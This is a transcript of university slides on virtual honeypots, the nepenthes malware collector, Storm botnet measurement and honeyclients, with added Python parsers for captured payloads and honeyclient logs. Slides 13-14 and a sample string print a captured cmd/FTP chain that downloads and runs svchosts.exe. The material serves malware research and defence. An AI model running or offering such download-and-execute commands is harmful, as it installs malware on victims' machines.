Virtual Honeypots UNIVERSITÄT MANNHEIM. Know Your Enemy. Pi1 - Laboratory for Dependable Distributed Systems
- Stephen Knight
- 8 years ago
Transcription
1 Virtual Honeypots Know Your Enemy Pi1 - Laboratory for Dependable Distributed Systems
2 Outline
- Honeypot 101
- Examples
- honeyd
- nepenthes
- Honeyclients
- Conclusion
3 Honeypots
- Network-based measurements often show us only the results of attacks
  - Scanning activity caused by worms
  - Spam sent via botnets
- How to learn more about the attackers?
- A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource.
Know Your Enemy
4 Honeypots
High-interaction:
- Real services, OS's, or applications
- Higher risk
- Hard to deploy / maintain
- Capture extensive amount of information
- Example: Gen III honeynets
Low-interaction:
- Emulation of TCP/IP stack, vulnerabilities, ...
- Lower risk
- Easy to deploy / maintain
- Capture quantitative information about attacks
- Examples: honeyd, nepenthes, labrea, ...
5 honeyd
- Low-interaction honeypot written by Niels Provos
- Available at
- Virtualization of TCP/IP stack
  - Fool tools like nmap & xprobe
- Complex setups possible
  - Latency, packet loss, bandwidth, ...
- Can emulate complex network setups
6 honeyd
[Architecture diagram; component labels: honeyd, libnet, libpcap, Personality engine, Userland IP-Stack, ICMP, UDP, TCP, Service, External Program, proxy]
7 Malware Collection
- Hundreds of new malware samples each month
- How to learn more about malware?
  - Quantitative information
  - Qualitative information
  - Information about new malware
- Usage of honeypot-based techniques
  - Use deception & emulation
8 nepenthes
- Tool to automatically collect malware like bots and other autonomous spreading malware
- Emulate known vulnerabilities and download malware trying to exploit these vulnerabilities
- Available at
9 Schematic Overview
10 Vulnerability modules
- Emulate vulnerable services
- Play with exploits until they send us their payload (finite state machine)
- Currently more than 20 vulnerability modules available
- More in development
- Analysis of known vulnerabilities & exploits necessary
- Automation possible?
[Diagram: module pipeline exploit, payload, URI, binary; module labels: vuln-lsass, vuln-dcom, vuln-ms06070, vuln-arcserve, vuln-...; shellcode-generic, shellemu-winnt, shellcode-signatures; download-http, download-tftp, download-csend, download-link, download-...; submit-file, submit-http, submit-postgres, submit-norman, submit-...]
11 Shellcode modules
- Automatically extract URL used by malware to transfer itself to compromised machine
- sch_generic_xor
  - Generic XOR decoder
- sch_generic_createprocess
- sch_generic_url
- sch_generic_cmd
[Diagram: module pipeline, repeated from slide 10]
12 Payload received after successful emulation
[hexdump(0x1bf7bb68, 0x000010c3) of the received payload; the ASCII column shows "SMB", filler bytes (AAAAAAAA ... BBBBBBBB) and a cmd /c command line]
13 Payload received after successful emulation
[Same hexdump, with the embedded command highlighted:]
cmd /c echo open [...] >> ii & echo user a a >> ii & echo binary >> ii & echo get svchosts.exe >> ii & echo bye >> ii & ftp -n -v -s:ii & del ii & svchosts.exe
14 Payload received after successful emulation
[Same hexdump and highlighted command, with the resulting download URI:]
ftp://a:a@ /svchosts.exe
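Added example, not part of the original slides and not nepenthes code: the step shown on slides 12 to 14, replaying the `echo ... >> ii` redirections of a captured command chain into the FTP script they write and turning that script into a download URI. The function names and the sample host (a documentation address, since the slide's address is not preserved) are assumptions made here.

```python
import re
from urllib.parse import quote

# Constructed sample modelled on the command highlighted on slide 13.
# 192.0.2.10 is a documentation address (RFC 5737), not a value from the slides.
SAMPLE = ("cmd /c echo open 192.0.2.10 21 >> ii &echo user a a >> ii "
          "&echo binary >> ii &echo get svchosts.exe >> ii &echo bye >> ii "
          "&ftp -n -v -s:ii &del ii &svchosts.exe")

ECHO_RE = re.compile(r"^echo\s+(.*?)\s*(>{1,2})\s*(\S+)$", re.I)
FTP_RE = re.compile(r"^ftp(?:\.exe)?\s+.*?-s:(\S+)", re.I)


def split_commands(cmdline):
    """Split a cmd.exe command chain on '&' and drop a leading 'cmd /c'."""
    body = re.sub(r"^\s*cmd(?:\.exe)?\s+/c\s+", "", cmdline, flags=re.I)
    return [part.strip() for part in body.split("&") if part.strip()]


def rebuild_scripts(commands):
    """Replay 'echo TEXT > file' / 'echo TEXT >> file' into per-file line lists."""
    scripts = {}
    for cmd in commands:
        m = ECHO_RE.match(cmd)
        if not m:
            continue
        text, op, target = m.groups()
        key = target.lower()          # Windows file names are case-insensitive
        if op == ">":
            scripts[key] = []         # '>' truncates, '>>' appends
        scripts.setdefault(key, []).append(text)
    return scripts


def ftp_script_to_urls(lines):
    """Interpret FTP client script lines and return one URI per 'get'."""
    host = port = None
    user, password = "anonymous", ""
    urls = []
    for line in lines:
        words = line.split()
        if not words:
            continue
        verb, args = words[0].lower(), words[1:]
        if verb == "open" and args:
            host = args[0]
            port = args[1] if len(args) > 1 else None
        elif verb == "user" and args:
            user = args[0]
            password = args[1] if len(args) > 1 else ""
        elif verb in ("get", "recv") and args and host:
            netloc = host if port in (None, "21") else f"{host}:{port}"
            cred = quote(user, safe="")
            if password:
                cred += ":" + quote(password, safe="")
            urls.append(f"ftp://{cred}@{netloc}/{quote(args[0])}")
    return urls


def extract_download_urls(cmdline):
    """Return the FTP URIs a 'cmd /c echo ... & ftp -s:file' chain would fetch."""
    commands = split_commands(cmdline)
    scripts = rebuild_scripts(commands)
    urls = []
    for cmd in commands:
        m = FTP_RE.match(cmd)
        if m:
            # Only a script that the same chain wrote can be resolved.
            urls.extend(ftp_script_to_urls(scripts.get(m.group(1).lower(), [])))
    return urls


if __name__ == "__main__":
    for url in extract_download_urls(SAMPLE):
        print(url)
```

The resulting URI is what a download module (slide 15) would be handed; a chain whose `ftp -s:` argument was never written by a preceding `echo` yields no URI.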
15 Download modules
- download-{http,tftp}
  - Handles HTTP / TFTP URIs
- download-ftp
  - FTP client from Windows is not RFC compliant...
- download-{csend,creceive}
- download-link
  - link:// /hj4g==
- download-...
[Diagram: module pipeline, repeated from slide 10]
16 Submission modules
- submit-file
  - Write file to hard disk
- submit-{mysql,postgres,mssql}
  - Store file in database
- submit-norman
  - Submit file to sandboxes for analysis
- submit-http
  - Send file via HTTP POST
- submit-...
[Diagram: module pipeline, repeated from slide 10]
17 CWSandbox
18 Statistics: nepenthes
- Eight weeks (December 06/January 07) nepenthes on ~8,000 IP addresses on one physical machine:
  - 13,000,000+ files downloaded
  - 2,600+ unique binaries based on md5sum
  - ~300 different botnets
- Anti-virus engines detect between 70% and 90% of the binaries
[Table: complete set (2,634 samples) by anti-virus engine (AV 1, AV 2, AV 3, ...); values not preserved]
- One bot variant dominates the collection
19 Statistics
20 Tracking Botnets
- Learning more about botnets with honeypots
  1. Collect samples with honeypots
  2. Automated analysis, e.g., cwsandbox.org
  3. Join botnet and observe from inside
- Know Your Enemy: Tracking Botnets
- LEET 08: Measurements and Mitigation of P2P-based Botnets: A Case Study on Storm Worm
21 Spam Mails
[Figure: spam mails sent by one infected Storm machine over several days; campaign labels: Stocks, Money, Kitty, Halloween, Jobs, Christmas, Newyear, Pharma, Valentine]
22
23 Inside Storm
- Network-level behavior
- First versions: Overnet (Kademlia-based DHT)
- Obfuscation was added in October 2007
  - Called Stormnet in the following
  - Seems to change from DHT to linked list
  - Only bots present in Stormnet
24 Inside Storm
- Bot communication (simplified, valid for Overnet)
- Infected machine searches for specific keys within the network
- Botmaster knows in advance which keys are searched for
  - publishes commands there
  - rendezvous points
25 Key Search
26 Key Search
27 Modes
- Two different modes: NAT or public IP address
[Figure "3.9 Overview"; labels: Spam/DoS bots, Gateways, Controller, TCP and Overnet, HTTP]
- Actually, Storm Worm is a hybrid network with a P2P component for lookup
28 Results
- Thousands of bots in Stormnet for US
- Diurnal pattern in Stormnet size
[Figure 4.8: Growth of the botnet in December. The data were kindly provided by Moritz Steiner. Axes: date, number of peers]
(a) Growth of Stormnet in December. With the start of the Christmas propagation campaign on [...], the botnet also begins to grow. The y-axis shows the number (in thousands) of distinct IP addresses per half hour.
(b) Enlarged section of 4.8a. The daily fluctuations follow a fixed rhythm.
29 Results
[Figure: number of bots in Stormnet, split by geo-location; axes: date, stormbots; legend: US, IN, --, TR]
30 Honeyclients Tracking New Attack Vectors
31 Malicious Websites
- More and more attacks against browsers
  - Operating systems get better and better
  - Applications become weakest link in chain
- Drive-by download to install malware
  - Malicious website sends several exploits to visitor (typically encoded, not easy to detect)
  - If one exploit is successful, malware is installed
32 Malicious Websites
- Social engineering is also common
  - Trick user into downloading executable
  - Often related to greeting cards or adult content
  - Examples: Storm Worm and Zlob
- Malicious results in search engines
  - Attackers place sites within Google's search index
  - Requests return these malicious sites
  - ~1-2 % of search results are malicious
33 Malicious Websites
- Analyzed several billion URLs
- In-depth analysis of 4.5M URLs
- Found malicious sites
- additional malicious sites
[Figure 1: This diagram shows an overview of our detection architecture. We heuristically select candidate URLs and determine via execution in a virtual machine if the URL exhibits malicious behavior. Labels: Web Page Repository, MapReduce Heuristical URL Extraction, URL, Virtual Machine, Internet Explorer, Monitor, Execution Analysis, Result, Malicious Page Repository]
Provos et al., The Ghost in the Browser: Analysis of Web-based Malware, HotBots 07
Thorsten Holz, Laboratory for Dependable Distributed Systems, Troopers 2008
34 Social Engineering
35 Social Engineering
36 Backends
37 Backends
38 Honeyclients
- Automatically search for malicious websites
  - Simulate browsing behavior
  - Closely observe system and detect anomalies
- HoneyMonkey (NDSS 06), Capture-HPC, HoneyC, HoneyClient, phoneyc, ...
- Can be generalized to learn more about attacks against all kinds of client applications
  - User simulation needed?
39 Honeyclients
- Capture-HPC ( capture-hpc)
- Client/Server model
- Analyze website with IE or other browser
40 Honeyclients
- Capture-HPC ( capture-hpc)
- Client/Server model
- Analyze website with IE or other browser
" :27:44","visiting","
" :28:35","error0:NETWORK_ERROR ", "
" :29:35","visiting","
" :30:33","error0:NETWORK_ERROR-404", "
" :31:29","visiting","
" :32:04","error0:NETWORK_ERROR ", "
" :55:00","visiting","
" :56:00","visited","
" :57:15","visiting","
" :58:45","visited","
41 Honeyclients
- Capture-HPC ( capture-hpc)
- Client/Server model
- Analyze website with IE or other browser
" :41:14","malicious","
" :42:53","malicious","
" :44:03","malicious","
Figure 5: Excerpt from malicious.log
Results: All URLs that were processed were classified as malicious. Since only URLs that appear on blacklists were examined, the result is not surprising at first. However, some websites were already offline at the time of the examination, which
"file","24/3/ :37:56.717", "C:\Programme\Internet Explorer\iexplore.exe","Write","C:\syst.exe"
"file","24/3/ :37:56.702", "System","Write","C:\WINDOWS\Temp\dnlsvc.exe"
"file","24/3/ :37:57.452", "System","Write","C:\syst.exe"
"process","24/3/ :37:57.733", "C:\Programme\Internet Explorer\iexplore.exe","created","C:\syst.exe"
Figure 6: Example of a successful compromise of the honeyclient
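Added example, not part of the original slides and not Capture-HPC code: parsing state-change records in the five-field layout shown in Figure 6 and flagging a file that is written during a visit and then started as a process. The dates and hours in the sample, the extra benign record, the suffix list and the verdict rule are assumptions made here.

```python
import csv
import io
from datetime import datetime
from pathlib import PureWindowsPath

# Constructed sample in the layout of Figure 6:
# type, timestamp, acting process, action, object.
# Year and hour are made up (the transcript lost them); the index.dat
# record is an added benign write for contrast.
SAMPLE_LOG = r'''
"file","24/3/2008 10:37:56.717", "C:\Programme\Internet Explorer\iexplore.exe","Write","C:\syst.exe"
"file","24/3/2008 10:37:56.702", "System","Write","C:\WINDOWS\Temp\dnlsvc.exe"
"file","24/3/2008 10:37:55.100", "C:\Programme\Internet Explorer\iexplore.exe","Write","C:\Dokumente\cache\index.dat"
"file","24/3/2008 10:37:57.452", "System","Write","C:\syst.exe"
"process","24/3/2008 10:37:57.733", "C:\Programme\Internet Explorer\iexplore.exe","created","C:\syst.exe"
'''

EXECUTABLE_SUFFIXES = {".exe", ".dll", ".scr", ".com", ".bat", ".sys"}
TS_FORMAT = "%d/%m/%Y %H:%M:%S.%f"


def parse_events(text):
    """Parse records into dicts sorted by time (the log is not in order)."""
    events = []
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if len(row) != 5:
            continue  # blank or truncated line
        kind, stamp, actor, action, target = row
        events.append({
            "kind": kind.lower(),
            "time": datetime.strptime(stamp, TS_FORMAT),
            "actor": actor,
            "action": action.lower(),
            "target": target,
        })
    return sorted(events, key=lambda e: e["time"])


def norm(path):
    """Windows paths are case-insensitive, so compare them lower-cased."""
    return str(PureWindowsPath(path)).lower()


def classify(events):
    """Return (finding, path, actor) tuples for time-ordered events."""
    written = {}   # normalised path -> time of first write
    findings = []
    for ev in events:
        target = norm(ev["target"])
        if ev["kind"] == "file" and ev["action"] == "write":
            is_exec = PureWindowsPath(target).suffix in EXECUTABLE_SUFFIXES
            if is_exec and target not in written:
                written[target] = ev["time"]
                findings.append(("executable-written", target, ev["actor"]))
        elif ev["kind"] == "process" and ev["action"] == "created":
            if target in written:
                findings.append(("dropped-and-executed", target, ev["actor"]))
            else:
                findings.append(("process-created", target, ev["actor"]))
    return findings


def verdict(findings):
    """Assumed rule: malicious once a file written during the visit is run."""
    kinds = {kind for kind, _, _ in findings}
    if "dropped-and-executed" in kinds:
        return "malicious"
    return "suspicious" if kinds else "benign"


if __name__ == "__main__":
    results = classify(parse_events(SAMPLE_LOG))
    for finding in results:
        print(finding)
    print(verdict(results))
```

Sorting before correlating matters here: as in Figure 6, records can appear out of timestamp order, and a process-creation record read before its matching write would otherwise miss the correlation.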
42 Conclusion
- Current honeypots are good at finding known attacks / automated attacks
  - We can detect worms, botnets, and other automated threats
- Finding 0-day / targeted attacks is harder
  - Why should an attacker waste his 0-day on my honeypot?
  - How to trick a clever attacker?
43
Thorsten Holz
thorsten.holz@informatik.uni-mannheim.de
More information:
[Book cover (Security): VIRTUAL HONEYPOTS: From Botnet Tracking to Intrusion Detection, Niels Provos and Thorsten Holz]
Honeypots have demonstrated immense value in Internet security, but physical honeypot deployment can be prohibitively complex, time-consuming, and expensive. Now, there's a breakthrough solution. Virtual honeypots share many attributes of traditional honeypots, but you can run thousands of them on a single system making them easier and cheaper to build, deploy, and maintain. In this hands-on, highly accessible book, two leading honeypot pioneers systematically introduce virtual honeypot technology.
One step at a time, you'll learn exactly how to implement, configure, use, and maintain virtual honeypots in your own environment, even if you've never deployed a honeypot before. You'll learn through examples, including Honeyd, the acclaimed virtual honeypot created by coauthor Niels Provos. The authors also present multiple real-world applications for virtual honeypots, including network decoy, worm detection, spam prevention, and network simulation.
After reading this book, you will be able to
- Compare high-interaction honeypots that provide real systems and services and the low-interaction honeypots that emulate them
- Install and configure Honeyd to simulate multiple operating systems, services, and network environments
- Use virtual honeypots to capture worms, bots, and other malware
- Create high-performance hybrid honeypots that draw on technologies from both low- and high-interaction honeypots
- Implement client honeypots that actively seek out dangerous Internet locations
- Understand how attackers identify and circumvent honeypots
- Analyze the botnets your honeypot identifies, and the malware it captures
- Preview the future evolution of both virtual and physical honeypots
"Provos and Holz have written the book that the bad guys don't want you to read. Virtual Honeypots is a must-read and belongs on the bookshelf of anyone who is serious about security." Aviel D. Rubin, Ph.D., Johns Hopkins University
"Virtual Honeypots is the best reference for honeypots today. Security experts Niels Provos and Thorsten Holz cover a large breadth of cutting-edge topics, from low-interaction honeypots to botnets and malware. If you want to learn about the latest types of honeypots, how they work and what they can do for you, this is the resource you need." Lance Spitzner, Founder, Honeynet Project
AUTHORS
Niels Provos is a senior staff engineer at Google. He developed Honeyd, an open source virtual honeypot that won the Tops in Innovation award from Network World and is one of the cocreators of OpenSSH. Provos holds a Degree in mathematics from the University of Hamburg and a Ph.D. in computer science and engineering from the University of Michigan.
Thorsten Holz is a Ph.D. student at the Laboratory for Dependable Distributed Systems at the University of Mannheim, Germany. He is one of the founders of the German Honeynet Project and a member of the Steering Committee of the Honeynet Research Alliance. He regularly blogs at
Cover design by Chuti Prasertsith. Cover photograph by Ryan McVay/Stone/Getty Images, Inc. Text printed on recycled paper. Includes FREE 45-Day Online Edition. ISBN-13: ISBN-10: $49.99 U.S./$61.99 CANADA
Pi1 - Laboratory for Dependable Distributed Systems
More informationGetting Ahead of Malware
IT@Intel White Paper Intel Information Technology Security December 2009 Getting Ahead of Malware Executive Overview Since implementing our security event monitor and detection processes two years ago,
More informationA Hybrid Honeypot Architecture for Scalable Network Monitoring
A Hybrid Honeypot Architecture for Scalable Network Monitoring Michael Bailey, Evan Cooke, David Watson, Farnam Jahanian University of Michigan {mibailey, emcooke, dwatson, farnam}@eecs.umich.edu Niels
More informationA Generic Toolkit for Converting Web Applications Into High-Interaction Honeypots
A Generic Toolkit for Converting Web Applications Into High-Interaction Honeypots Michael Müter 1, Felix Freiling 1, Thorsten Holz 1, and Jeanna Matthews 2 1 Laboratory for Dependable Distributed Systems
More informationAttacks from the Inside
Attacks from the Inside Eddy Willems, G Data Righard J. Zwienenberg, Norman Attacks from the Inside. Agenda - Social Networking / Engineering - Where are the threats coming from - Infection vectors - The
More informationAutomating Linux Malware Analysis Using Limon Sandbox Monnappa K A monnappa22@gmail.com
Automating Linux Malware Analysis Using Limon Sandbox Monnappa K A monnappa22@gmail.com A number of devices are running Linux due to its flexibility and open source nature. This has made Linux platform
More informationBuyers Guide to Web Protection
Buyers Guide to Web Protection The web is the number one source for malware distribution today. While many organizations have replaced first-generation URL filters with secure web gateways, even these
More informationHoneypots & Honeynets Overview. Adli Wahid Security Specialist, APNIC.net adli@apnic.net
Honeypots & Honeynets Overview Adli Wahid Security Specialist, APNIC.net adli@apnic.net 1 Contents 1. ObjecCves 2. DefiniCon of Honeypot & Honeynets 3. Benefits & Risk consideracon 4. Example of Honeypot
More informationBotnet Tracking: Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Botnet Tracking: Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks Felix C. Freiling, Thorsten Holz, and Georg Wicherski Laboratory for Dependable Distributed Systems,
More informationDESIGN OF NETWORK SECURITY PROJECTS USING HONEYPOTS *
DESIGN OF NETWORK SECURITY PROJECTS USING HONEYPOTS * Karthik Sadasivam, Banuprasad Samudrala, T. Andrew Yang University of Houston Clear Lake 2700 Bay Area Blvd., Houston, TX 77058 (281) 283-3835, yang@cl.uh.edu
More informationIDS / IPS. James E. Thiel S.W.A.T.
IDS / IPS An introduction to intrusion detection and intrusion prevention systems James E. Thiel January 14, 2005 S.W.A.T. Drexel University Overview Intrusion Detection Purpose Types Detection Methods
More informationWeb Client Attacks. Scribed by Gelareh Taban. April 21, 2008. 1 Web Server Attacks continued
Web Client Attacks Scribed by Gelareh Taban April 21, 2008 1 Web Server Attacks continued We first conclude our discussion of detection of web server attacks from the previous lecture, which focused on
More informationA Pointillist Approach for Comparing Honeypots. Fabien Pouget, Thorsten Holz
A Pointillist Approach for Comparing Honeypots Fabien Pouget, Thorsten Holz Motivations What are the Modus Operandi of the perpetrators? Who has data to validate in a rigorous way any kind of taxonomy
More informationQUARTERLY REPORT 2015 INFOBLOX DNS THREAT INDEX POWERED BY
QUARTERLY REPORT 2015 INFOBLOX DNS THREAT INDEX POWERED BY EXPLOIT KITS UP 75 PERCENT The Infoblox DNS Threat Index, powered by IID, stood at 122 in the third quarter of 2015, with exploit kits up 75 percent
More informationLASTLINE WHITEPAPER. In-Depth Analysis of Malware
LASTLINE WHITEPAPER In-Depth Analysis of Malware Abstract Malware analysis is the process of determining the purpose and functionality of a given malware sample (such as a virus, worm, or Trojan horse).
More informationAdvanced Honeypot System for Analysing Network Security
ISSN: 2347-3215 Volume 2 Number 4 (April-2014) pp. 65-70 www.ijcrar.com Advanced Honeypot System for Analysing Network Security Suruchi Narote 1* and Sandeep Khanna 2 1 Department of Computer Engineering.
More information2014 ASE BIGDATA/SOCIALCOM/CYBERSECURITY Conference, Stanford University, May 27-31, 2014 ASE 2014 ISBN: 978-1-62561-000-3 1
ASE 2014 ISBN: 978-1-62561-000-3 1 Network Traffic Analysis of ZeroAccess Bot Shree Garg, Anil K. Sarje, Sateesh K. Peddoju Department of Computer Science & Engineering Indian Institute of Technology Roorkee,
More informationCatching hackers using a virtual honeynet: A case study
Catching hackers using a virtual honeynet: A case study D.N. Pasman d.n.pasman@student.utwente.nl ABSTRACT This paper presents an evaluation of honeypots used for gathering information about the methods
More informationCloud Services Prevent Zero-day and Targeted Attacks
Cloud Services Prevent Zero-day and Targeted Attacks WOULD YOU OPEN THIS ATTACHMENT? 2 TARGETED ATTACKS BEGIN WITH ZERO-DAY EXPLOITS Duqu Worm Causing Collateral Damage in a Silent Cyber-War Worm exploiting
More informationHow To Protect Your Firewall From Attack From A Malicious Computer Or Network Device
Ch.9 Firewalls and Intrusion Prevention Systems Firewalls: effective means of protecting LANs Internet connectivity is essential for every organization and individuals introduces threats from the Internet
More informationNetworks and Security Lab. Network Forensics
Networks and Security Lab Network Forensics Network Forensics - continued We start off from the previous week s exercises and analyze each trace file in detail. Tools needed: Wireshark and your favorite
More informationNEXPOSE ENTERPRISE METASPLOIT PRO. Effective Vulnerability Management and validation. March 2015
NEXPOSE ENTERPRISE METASPLOIT PRO Effective Vulnerability Management and validation March 2015 KEY SECURITY CHALLENGES Common Challenges Organizations Experience Key Security Challenges Visibility gaps
More informationDivide and Conquer Real World Distributed Port Scanning
Divide and Conquer Real World Distributed Port Scanning Ofer Maor CTO Hacktics 16 Feb 2006 Hackers & Threats I, 3:25PM (HT1-302) Introduction Divide and Conquer: Real World Distributed Port Scanning reviews
More informationWHITE PAPER. FortiGate DoS Protection Block Malicious Traffic Before It Affects Critical Applications and Systems
WHITE PAPER FortiGate DoS Protection Block Malicious Traffic Before It Affects Critical Applications and Systems Abstract: Denial of Service (DoS) attacks have been a part of the internet landscape for
More informationProtecting the Infrastructure: Symantec Web Gateway
Protecting the Infrastructure: Symantec Web Gateway 1 Why Symantec for Web Security? Flexibility and Choice Best in class hosted service, appliance, and virtual appliance (upcoming) deployment options
More informationHoneypots / honeynets
Honeypots / honeynets presentatie naam 1 Agenda Honeypots Honeynets Honeywall presentatie naam 2 Traffic Problem: Vast quantities of normal traffic Find suspect bits presentatie naam 3 Honeypot Machine
More informationDan Hubbard VP Security Research
Dan Hubbard VP Security Research Perpetual Beta = Live Testing = Trouble Airline Terminals using Active Script Start : Middle : End Wait, the Web has version numbers? Web Two Dot UH-OH or Exploit 2.0 An
More informationCloud Services Prevent Zero-day and Targeted Attacks Tom De Belie Security Engineer. [Restricted] ONLY for designated groups and individuals
Cloud Services Prevent Zero-day and Targeted Attacks Tom De Belie Security Engineer Facts 2 3 WOULD YOU OPEN THIS ATTACHMENT? 4 TARGETED ATTACKS BEGIN WITH ZERO-DAY EXPLOITS 5 Check Point Multi-Layered
More informationSeminar Computer Security
Seminar Computer Security DoS/DDoS attacks and botnets Hannes Korte Overview Introduction What is a Denial of Service attack? The distributed version The attacker's motivation Basics Bots and botnets Example
More informationReal World and Vulnerability Protection, Performance and Remediation Report
Real World and Vulnerability Protection, Performance and Remediation Report A test commissioned by Symantec Corporation and performed by AV-Test GmbH Date of the report: September 17 th, 2014, last update:
More informationHoneyBOT User Guide A Windows based honeypot solution
HoneyBOT User Guide A Windows based honeypot solution Visit our website at http://www.atomicsoftwaresolutions.com/ Table of Contents What is a Honeypot?...2 How HoneyBOT Works...2 Secure the HoneyBOT Computer...3
More informationDetecting P2P-Controlled Bots on the Host
Detecting P2P-Controlled Bots on the Host Antti Nummipuro Helsinki University of Technology anummipu # cc.hut.fi Abstract Storm Worm is a trojan that uses a Peer-to-Peer (P2P) protocol as a command and
More informationNetwork Based Intrusion Detection Using Honey pot Deception
Network Based Intrusion Detection Using Honey pot Deception Dr.K.V.Kulhalli, S.R.Khot Department of Electronics and Communication Engineering D.Y.Patil College of Engg.& technology, Kolhapur,Maharashtra,India.
More informationCost-effective Detection of Drive-by-Download Attacks with Hybrid Client Honeypots
Cost-effective Detection of Drive-by-Download Attacks with Hybrid Client Honeypots by Christian Seifert A thesis submitted to the Victoria University of Wellington in fulfilment of the requirements for
More informationA Survey on Honeypot Based Signature Generation Techniques in Computer Network Security
A Survey on Honeypot Based Signature Generation Techniques in Computer Network Security Geetika yadav 1, Ms.Prabhjot Kaur 2 1 M.Tech Student, Department of CSE, B.S.Anangpuria Institute of Technology and
More informationDetecting Botnet Propagation
Detecting Botnet Propagation How to confirm maliciousness Table of Contents This paper describes techniques that should only be performed by qualified experts in a controlled and isolated environment.
More informationProtecting against DoS/DDoS Attacks with FortiWeb Web Application Firewall
Protecting against DoS/DDoS Attacks with FortiWeb Web Application Firewall A FORTINET WHITE PAPER www.fortinet.com Introduction Denial of Service attacks are rapidly becoming a popular attack vector used
More informationData Collection and Data Analysis in Honeypots and Honeynets
Data Collection and Data Analysis in Honeypots and Honeynets Pavol Sokol, Patrik Pekarčík, Tomáš Bajtoš pavol.sokol@upjs.sk, patrik.pekarcik@upjs.sk, tomas.bajtos@student.upjs.sk Institute of Computer
More informationspying with bots spying with bots
spying with bots T HORSTEN HOLZ spying with bots Thorsten Holz is a research student at the Laboratory for Dependable Distributed Systems at RWTH Aachen University. He is one of the founders of the German
More informationInside the Storm: Protocols and Encryption of the Storm Botnet
Inside the Storm: Protocols and Encryption of the Storm Botnet Joe Stewart, GCIH Director of Malware Research, SecureWorks To be covered in this talk: Quick-and-dirty unpacking of Storm Structure of the
More information[ X OR DDoS T h r e a t A d v i sory] akamai.com
[ X OR DDoS T h r e a t A d v i sory] akamai.com What is the XOR DDoS threat The XOR DDoS botnet has produced DDoS attacks from a few Gbps to 150+ Gbps The gaming sector has been the primary target, followed
More informationBarracuda Intrusion Detection and Prevention System
Providing complete and comprehensive real-time network protection Today s networks are constantly under attack by an ever growing number of emerging exploits and attackers using advanced evasion techniques
More informationAutonomous Hybrid Honeypot as the Future of Distributed Computer Systems Security
Acta Polytechnica Hungarica Vol. 10, No. 6, 2013 Autonomous Hybrid Honeypot as the Future of Distributed Computer Systems Security Peter Fanfara, Marek Dufala, Ján Radušovský Department of Computers and
More informationSteps Towards a DoS-resistant Internet Architecture. Mark Handley Adam Greenhalgh University College London
Steps Towards a DoS-resistant Internet Architecture Mark Handley Adam Greenhalgh University College London Denial-of-Service Attacker attempts to prevent the victim from doing any useful work. Flooding
More information